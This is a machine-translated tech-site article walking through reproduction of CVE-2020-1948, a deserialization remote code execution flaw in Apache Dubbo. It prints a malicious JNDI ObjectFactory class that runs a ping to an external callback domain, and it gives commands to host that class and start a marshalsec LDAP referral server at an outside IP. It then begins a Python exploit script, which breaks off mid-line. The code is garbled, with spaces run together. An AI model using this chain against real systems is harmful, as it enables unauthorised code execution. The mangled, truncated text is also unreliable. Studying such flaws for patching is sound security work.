Shulou(Shulou.com)05/31 Report--

How to carry out Apache Dubbo deserialization vulnerability analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Brief introduction

Dubbo is a high-performance and excellent service framework open source by Alibaba Company, which enables applications to realize the output and input functions of services through high-performance RPC, and can be seamlessly integrated with Spring framework. It provides three core capabilities: interface-oriented remote method invocation, intelligent fault tolerance and load balancing, and automatic service registration and discovery.

Overview

Apache Dubbo officially issued a risk notice for Apache Dubbo remote code execution on June 23, 2020. The vulnerability number is CVE-2020-1948, vulnerability level: high risk. Apache Dubbo is a high-performance, lightweight open source Java RPC framework that provides three core capabilities: interface-oriented remote method invocation, intelligent fault tolerance and load balancing, and automatic service registration and discovery. Apache Dubbo Provider has a deserialization vulnerability that allows attackers to send unrecognized service or method names as well as some malicious parameter payloads via RPC requests, which can cause remote code execution when malicious parameters are deserialized.

Affect the version

Dubbo 2.7.0-2.7.6 Dubbo 2.6.0-2.6.7 Dubbo 2.5.x (official no longer maintenance)

Environment building

The jdk version of both the running environment and the compiled exp environment is 8u121. Start the test environment.

Java-jar dubbo.jar

Port 12345 will be monitored after startup.

Loophole recurrence

Service fingerprint:

PORT STATE SERVICE VERSION12345/tcp opentextui Alibaba Dubbo remoting telnetd

To construct the poc, we execute a ping command here to verify that the command can be executed, and create a new calc.java

Importjavax.naming.Context;importjavax.naming.Name;importjavax.naming.spi.ObjectFactory;importjava.util.Hashtable;publicclasscalc implementsObjectFactory {@ OverridepublicObjectgetObjectInstance (Objectobj,Namename,ContextnameCtx,Hashtableenvironment) throwsException {Runtime.getRuntime () .exec ("ping test.sr3uwk.ceye.io"); returnnull;}}

Compile poc

Javac calc.java

Put the compiled poc (calc.class) in the directory of the web website to ensure that the vulnerable host can access to start a ldap proxy service using the marshalsec project and download marshalsec:

Https://github.com/RandomRobbieBF/marshalsec-jar/raw/master/marshalsec-0.0.3-SNAPSHOT-all.jar

Start the LDAP proxy service, execute this command, and the ldap service listens on port 8086

Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://139.9.198.30/#calc 8086

Execute the test script, where the test uses the python environment of 3.8.0, install the dependency package first

Python3-m pip install dubbo-py

Content of the script (Dubbo.py):

#-*-coding: utf-8-*-importsysfromdubbo.codec.hessian2 importDecoder,new_objectfromdubbo.client importDubboClientiflen (sys.argv)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.